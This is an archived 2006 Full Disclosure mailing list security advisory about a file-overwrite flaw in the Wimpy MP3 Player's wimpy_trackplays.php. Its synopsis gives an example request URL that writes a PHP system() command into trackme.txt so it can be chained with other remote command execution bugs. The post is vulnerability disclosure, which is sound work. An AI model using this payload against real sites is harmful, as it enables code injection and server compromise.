Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Wimpy MP3 Player - Text file overwrite vulnerability

From: Scott Dewey <wr0ck.lists () gmail com>
Date: Wed, 15 Feb 2006 20:55:15 -0500
=======================================================================================
XOR Crew :: Security Advisory                                         
       2/10/2006
=======================================================================================
Wimpy MP3 Player - Text file overwrite. (lame)
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN/
=======================================================================================

:: Summary

      Vendor       :  Plaino Inc.
      Vendor Site  :  http://www.wimpyplayer.com/
      Product(s)   :  Wimpy MP3 PLayer
      Version(s)   :  All
      Severity     :  Low
      Impact       :  trackme.txt overwrite
      Release Date :  2/10/2006
      Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

Wimpy provides a simple, clean, enjoyable listening experience for
your website's
visitors.  Lists and plays an entire directory full of mp3 files automatically.

=======================================================================================

II. Synopsis

The file wimpy_trackplays.php does not check the variables passed to
it prior to
writing the contents of those variables to trackme.txt.  That allows
us to write
anything we want to trackme.txt.  This is not really a problem for the
server running
wimpy.  The problem lies in the fact that being able to write to
trackme.txt allows
the attacker a jump off point for other Remote Command Execution Bugs
that read from
text files.  These bugs are quite common and thus wimpy aids the
attacker in staying
annonymous.

Example:

http://www.site.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays
&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>

that writes:

<?php
system("uname -a;id;");
?>

to trackme.txt.  Then all the attacker has to do is point is RCE
exploit to trackme.txt
and there you have it.  So yeah lame vuln but interesting.  Peace out.

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

=======================================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: